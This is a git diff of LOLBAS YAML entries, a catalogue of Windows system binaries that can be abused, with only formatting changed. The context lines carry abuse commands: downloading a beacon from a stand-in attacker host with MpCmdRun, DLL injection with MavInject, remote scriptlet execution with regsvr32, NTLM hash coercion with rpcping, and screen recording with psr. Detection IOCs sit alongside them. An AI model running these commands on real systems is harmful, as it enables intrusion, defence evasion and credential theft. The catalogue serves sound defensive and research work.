Person: Malwrologist Handle: '@DissectMalware' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 89e332e..614a280 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -2,7 +2,7 @@ Name: Makecab.exe Description: Binary to package existing files into a cabinet (.cab) file Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. @@ -31,7 +31,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Makecab getting files from Internet @@ -41,4 +41,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index d1d1530..37a0ade 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -2,7 +2,7 @@ Name: Mavinject.exe Description: Used by App-v in Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll Description: Inject evil.dll into a process with PID 3110. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: mavinject.exe should not run unless APP-v is in use on the workstation @@ -36,4 +36,4 @@ Acknowledgement: Handle: '@gN3mes1s' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index b08bedd..c929fb6 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -2,7 +2,7 @@ Name: Microsoft.Workflow.Compiler.exe Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code. Author: 'Conor Richard' -Created: '2018-10-22' +Created: 2018-10-22 Commands: - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file. @@ -19,7 +19,7 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -27,10 +27,10 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations. @@ -53,4 +53,4 @@ Acknowledgement: Handle: '@FortyNorthSec' - Person: Bank Security Handle: '@Bank_Security' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index ab0fb79..3be81b8 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -2,7 +2,7 @@ Name: Mmc.exe Description: Load snap-ins to locally and remotely manage Windows systems Author: '@bohops' -Created: '2018-12-04' +Created: 2018-12-04 Commands: - Command: mmc.exe -Embedding c:\path\to\test.msc Description: Launch a 'backgrounded' MMC process and invoke a COM payload @@ -15,10 +15,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ Acknowledgement: diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 57da8bd..eee65a8 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -2,7 +2,7 @@ Name: MpCmdRun.exe Description: Binary part of Windows Defender. Used to manage settings in Windows Defender Author: 'Oddvar Moe' -Created: '09/03/2020' +Created: 2020-03-20 Commands: - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) @@ -32,9 +32,9 @@ Full_Path: - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: MpCmdRun storing data into alternate data streams. - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. @@ -54,4 +54,4 @@ Acknowledgement: Handle: '' - Person: Cedric Handle: '@th3c3dr1c' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index b5bfbe5..c9d598c 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -1,8 +1,8 @@ --- -Name: Msbuild.exe +Name: Msbuild.exe Description: Used to compile and execute code Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msbuild.exe pshell.xml Description: Build and execute a C# project stored in the target XML file. @@ -27,7 +27,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Msbuild.exe should not normally be executed on workstations @@ -41,4 +41,4 @@ Acknowledgement: Handle: '@subtee' - Person: Cn33liz Handle: '@Cneelis' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 6f9dbfc..7e1cc1f 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -2,7 +2,7 @@ Name: Msconfig.exe Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Msconfig.exe -5 Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\msconfig.exe -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml Detection: - IOC: mscfgtlc.xml changes in system32 folder @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index b460d25..ed2f045 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -1,8 +1,8 @@ --- Name: Msdt.exe -Description: Microsoft diagnostics tool +Description: Microsoft diagnostics tool Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. @@ -23,15 +23,15 @@ Commands: Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml Detection: - - IOC: + - IOC: Resources: - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - Link: https://twitter.com/harr0ey/status/991338229952598016 Acknowledgement: - - Person: + - Person: Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index d5ef45f..ea69e13 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -2,7 +2,7 @@ Name: Mshta.exe Description: Used by Windows to execute html applications. (.hta) Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: mshta.exe evilfile.hta Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. @@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct Detection: - IOC: mshta.exe executing raw or obfuscated script within the command-line @@ -48,10 +48,10 @@ Resources: - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 8d52eb1..944b991 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -2,7 +2,7 @@ Name: Msiexec.exe Description: Used by Windows to execute msi files Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msiexec /quiet /i cmd.msi Description: Installs the target .MSI file silently. @@ -35,11 +35,11 @@ Commands: Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: msiexec.exe getting files from Internet @@ -51,4 +51,4 @@ Acknowledgement: Handle: '@netbiosX' - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 63b0d40..e81499a 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -2,7 +2,7 @@ Name: Netsh.exe Description: Netsh is a Windows tool used to manipulate network interface settings. Author: 'Freddie Barr-Smith' -Created: '2019-12-24' +Created: 2019-12-24 Commands: - Command: netsh.exe add helper C:\Users\User\file.dll Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Netsh initiating a network connection @@ -32,4 +32,4 @@ Acknowledgement: Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 2ed0304..0102b45 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -2,7 +2,7 @@ Name: Odbcconf.exe Description: Used in Windows for managing ODBC connections Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: odbcconf -f file.rsp Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\odbcconf.exe - Path: C:\Windows\SysWOW64\odbcconf.exe -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp Detection: - IOC: @@ -36,4 +36,4 @@ Acknowledgement: Handle: '@subtee' - Person: Adam Handle: '@Hexacorn' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index c568598..dc1fa0e 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -2,7 +2,7 @@ Name: Pcalua.exe Description: Program Compatibility Assistant Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: pcalua.exe -a calc.exe Description: Open the target .EXE using the Program Compatibility Assistant. @@ -30,7 +30,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\pcalua.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -41,4 +41,4 @@ Acknowledgement: Handle: '@kylehanslovan' - Person: Fab Handle: '@0rbz_' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index 2e3c31c..bd21f1c 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -2,7 +2,7 @@ Name: Pcwrun.exe Description: Program Compatibility Wizard Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Pcwrun.exe c:\temp\beacon.exe Description: Open the target .EXE file with the Program Compatibility Wizard. @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\pcwrun.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -23,4 +23,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml index 29730a4..0a78757 100644 --- a/yml/OSBinaries/Pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -2,7 +2,7 @@ Name: Pktmon.exe Description: Capture Network Packets on the windows 10 with October 2018 Update or later. Author: 'Derek Johnson' -Created: '2020-08-12' +Created: 2020-08-12 Commands: - Command: pktmon.exe start --etw Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop @@ -23,9 +23,9 @@ Commands: Full_Path: - Path: c:\windows\system32\pktmon.exe - Path: c:\windows\syswow64\pktmon.exe -Code_Sample: +Code_Sample: - Code: -Detection: +Detection: - IOC: .etl files found on system Resources: - Link: https://binar-x79.com/windows-10-secret-sniffer/ diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 0733048..fdfb3aa 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -2,7 +2,7 @@ Name: Presentationhost.exe Description: File is used for executing Browser applications Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Presentationhost.exe C:\temp\Evil.xbap Description: Executes the target XAML Browser Application (XBAP) file @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index a91dd92..3bac72e 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -2,7 +2,7 @@ Name: Print.exe Description: Used by Windows to send files to the printer Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. @@ -31,7 +31,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\print.exe - Path: C:\Windows\SysWOW64\print.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Print.exe getting files from internet @@ -42,4 +42,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml index 4a37660..dc59849 100644 --- a/yml/OSBinaries/Psr.yml +++ b/yml/OSBinaries/Psr.yml @@ -2,7 +2,7 @@ Name: Psr.exe Description: Windows Problem Steps Recorder, used to record screen and clicks. Author: Leon Rodenko -Created: '2020-06-27' +Created: 2020-06-27 Commands: - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. @@ -15,9 +15,9 @@ Commands: Full_Path: - Path: c:\windows\system32\psr.exe - Path: c:\windows\syswow64\psr.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: psr.exe spawned - IOC: suspicious activity when running with "/gui 0" flag Resources: diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml index e9276d5..6a7419c 100644 --- a/yml/OSBinaries/Rasautou.yml +++ b/yml/OSBinaries/Rasautou.yml @@ -2,9 +2,9 @@ Name: Rasautou.exe Description: Windows Remote Access Dialer Author: 'Tony Lambert' -Created: '2020-01-10' +Created: 2020-01-10 Commands: - - Command: rasautou -d powershell.dll -p powershell -a a -e e + - Command: rasautou -d powershell.dll -p powershell -a a -e e Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10. Usecase: Execute DLL code Category: Execute @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 Full_Path: - Path: C:\Windows\System32\rasautou.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: rasautou.exe command line containing -d and -p @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: FireEye Handle: '@FireEye' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 7d5f928..0a1de91 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml @@ -2,7 +2,7 @@ Name: Reg.exe Description: Used to manipulate the registry Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\reg.exe - Path: C:\Windows\SysWOW64\reg.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: reg.exe writing to an ADS @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 1729e21..507698c 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -2,9 +2,9 @@ Name: Regasm.exe Description: Part of .NET Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - - Command: regasm.exe AllTheThingsx64.dll + - Command: regasm.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL bypass @@ -12,7 +12,7 @@ Commands: MitreID: T1121 MitreLink: https://attack.mitre.org/wiki/Technique/T1121 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: regasm.exe /U AllTheThingsx64.dll + - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: Execute @@ -25,7 +25,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: regasm.exe executing dll file diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 1a52026..c0fba2c 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -2,7 +2,7 @@ Name: Regedit.exe Description: Used by Windows to manipulate registry Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey Description: Export the target Registry key to the specified .REG file. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\regedit.exe - Path: C:\Windows\SysWOW64\regedit.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: regedit.exe reading and writing to alternate data stream @@ -33,4 +33,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml index ce20f4c..2afa964 100644 --- a/yml/OSBinaries/Regini.yml +++ b/yml/OSBinaries/Regini.yml @@ -2,7 +2,7 @@ Name: Regini.exe Description: Used to manipulate the registry Author: 'Oddvar Moe' -Created: '2020-07-03' +Created: 2020-07-03 Commands: - Command: regini.exe newfile.txt:hidden.ini Description: Write registry keys from data inside the Alternate data stream. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\regini.exe - Path: C:\Windows\SysWOW64\regini.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: regini.exe reading from ADS @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Eli Salem Handle: '@elisalem9' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index a19a039..46464c3 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -2,7 +2,7 @@ Name: Register-cimprovider.exe Description: Used to register new wmi providers Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Register-cimprovider -path "C:\folder\evil.dll" Description: Load the target .DLL. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 274d275..048a415 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -2,7 +2,7 @@ Name: Regsvcs.exe Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\regsvcs.exe - Path: C:\Windows\SysWOW64\regsvcs.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 02e262b..7ef5375 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -2,7 +2,7 @@ Name: Regsvr32.exe Description: Used by Windows to register dlls Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. @@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: regsvr32.exe getting files from Internet @@ -51,4 +51,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index 85bbdbc..398f2a6 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml @@ -1,12 +1,12 @@ --- Name: Replace.exe -Description: Used to replace file with another file +Description: Used to replace file with another file Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: replace.exe C:\Source\File.cab C:\Destination /A Description: Copy file.cab to destination - Usecase: Copy files + Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A Description: Download/Copy bar.exe to outdir - Usecase: Download file + Usecase: Download file Category: Download Privileges: User MitreID: T1105 @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\replace.exe - Path: C:\Windows\SysWOW64\replace.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Replace.exe getting files from remote server @@ -33,4 +33,4 @@ Resources: Acknowledgement: - Person: elceef Handle: '@elceef' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index 3c2d344..38e67b0 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml @@ -2,7 +2,7 @@ Name: Rpcping.exe Description: Used to verify rpc connection Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\rpcping.exe - Path: C:\Windows\SysWOW64\rpcping.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -28,4 +28,4 @@ Acknowledgement: Handle: '@subtee' - Person: Vincent Yiu Handle: '@vysecurity' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 2b7c2b1..52ff1aa 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -2,7 +2,7 @@ Name: Rundll32.exe Description: Used by Windows to execute dll files Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe AllTheThingsx64,EntryPoint Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. @@ -65,13 +65,13 @@ Commands: Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Category: Execute Privileges: User - MitreID: - MitreLink: + MitreID: + MitreLink: OperatingSystem: Windows 10 (and likely previous versions) Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index f317e7d..c053430 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -1,8 +1,8 @@ --- Name: Runonce.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Runonce.exe /AlternateShellStartup Description: Executes a Run Once Task that has been configured in the registry @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 2b62f1a..ddcdd0e 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -1,8 +1,8 @@ --- Name: Runscripthelper.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: runscripthelper.exe 